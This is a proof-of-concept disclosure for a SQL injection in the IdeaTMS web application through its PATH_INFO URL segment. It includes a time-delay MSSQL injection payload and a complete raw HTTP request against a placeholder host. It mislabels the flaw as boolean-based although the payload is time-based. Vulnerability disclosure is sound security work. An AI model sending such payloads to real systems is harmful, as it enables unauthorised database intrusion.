CVE-2022-31787: SQL Injection Vulnerability PoC #2 - IdeaTMS

Vulnerability Type: SQL Injection Vulnerability (Boolean-Based Blind)

Vendor of Product: Ideaco.ir

Affected Product Code Base: IdeaTMS

Product Version: 2022

Description: IdeaTMS allows SQL Injection via the PATH_INFO

Attack Vectors: Attacker should inject malicious payload into PATH_INFO

Attack Type: Remote

Payload: zsuuiI8Y’%3b%20waitfor%20delay%20’0:0:20’%20–%20

Assigned CVE-ID: <TBD>

Discoverer: Mohammad Reza Ismaeli Taba, Raspina Net Pars Group (RNPG Ltd.)

Steps To Reproduce

1. Browse the following page: https://<target.xyz>/IdeaWeb/PersonnelInfo/InfoDetails/[PATH_INFO]

2. Insert the malicious query as the value in PATH_INFO

Example: https://<target.xyz>/IdeaWeb/PersonnelInfo/InfoDetails/zsuuiI8Y’%3b%20waitfor%20delay%20’0:0:20’%20–%20

#PoC

GET /IdeaWeb/PersonnelInfo/InfoDetails/zsuuiI8Y’%3b%20waitfor%20delay%20’0:0:20’%20–%20 HTTP/1.1

Host: <address in which IdeaTMS is set up>

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:69.0) Gecko/20100101 Firefox/69.0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Language: en-US,en;q=0.5

Accept-Encoding: gzip, deflate

Connection: close